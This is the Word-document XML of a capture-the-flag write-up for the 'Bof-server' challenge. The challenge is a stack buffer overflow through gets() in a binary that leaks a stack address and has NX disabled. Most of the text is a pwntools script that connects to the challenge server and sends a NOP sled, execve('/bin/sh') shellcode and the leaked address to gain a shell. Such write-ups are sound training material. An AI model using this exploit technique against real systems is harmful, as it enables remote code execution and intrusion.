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160" w:before="160" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="3c763d"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tcgou73qph01" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="337ab7"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bof-server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="3c763d"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (100pts)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challenge gives us a binary and its source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&lt;string.h&gt;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buf[</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"Hello! Here is the stack address: %llx, enter your name please: "</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">, buf);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">fflush(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffaa"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">stdout</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">);</w:t>
              <w:br w:type="textWrapping"/>
              <w:tab/>
              <w:t xml:space="preserve">gets(buf);</w:t>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"Nice to meet you, %s!\n"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">, buf);</w:t>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we can see, this challenge sports a stack based buffer overflow. Let’s run checksec to see what protections does it employ.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60985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98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binary doesn’t have any protection besides Partial RELRO. As the NX bit is disabled, we can easily execute shellcode we place on the stack, after using the buffer overflow to jump to the stack address that the binary already leaks. This python script does just that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E">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#!/usr/bin/env python2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 coding: utf-8 -*-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This exploit template was generated via:</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 pwn template --host 89.38.208.144 --port 11112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pwn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br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="888888"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Set up pwntools for the correct architecture</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">context.update(arch=</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'i386'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">exe = </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'./bof-server'</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Many built-in settings can be controlled on the command-line and show up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in "args".  For example, to dump all data sent/received, and disable ASLR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for all created processes...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./exploit.py DEBUG NOASLR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./exploit.py GDB HOST=example.com PORT=4141</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">host = args.HOST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'89.38.208.144'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">port = int(args.PORT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11112</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local</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(argv=[], *a, **kw):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'''Execute the target binary locally'''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args.GDB:</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gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)</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process([exe] + argv, *a, **kw)</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remote</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(argv=[], *a, **kw):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'''Connect to the process on the remote host'''</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    io = connect(host, port)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args.GDB:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        gdb.attach(io, gdbscript=gdbscript)</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io</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start</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(argv=[], *a, **kw):</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'''Start the exploit against the target.'''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args.LOCAL:</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local(argv, *a, **kw)</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remote(argv, *a, **kw)</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="888888"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Specify your GDB script here for debugging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GDB will be launched if the exploit is run via e.g.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./exploit.py GDB</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">gdbscript = </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'''</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">b *0x000000000040061C</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">continue</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">'''</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">.format(**locals())</w:t>
              <w:br w:type="textWrapping"/>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EXPLOIT GOES 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t xml:space="preserve">io = start()</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">io.recvuntil(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'Hello! Here is the stack address: '</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">stack = int(io.recvuntil(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).strip(</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hex(stack)</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc = </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'\x48\x31\xC0\x50\x48\xB8\x2F\x2F\x62\x69\x6E\x2F\x73\x68\x50\x48\x31\xC0\xB0\x3B\x48\x89\xE7\x48\x31\xF6\x48\x31\xD2\x0F\x05'</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">io.sendline(</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">'\x90'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0x100</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> - len(sc)) + sc + </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p64(stack))</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="888888"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># shellcode = asm(shellcraft.sh())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payload = fit({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32: 0xdeadbeef,</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'iaaa': [1, 2, 'Hello', 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 length=128)</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io.send(payload)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flag = io.recv(...)</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log.success(flag)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">io.interactive()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imisoaractf.ro/challenge?id=25"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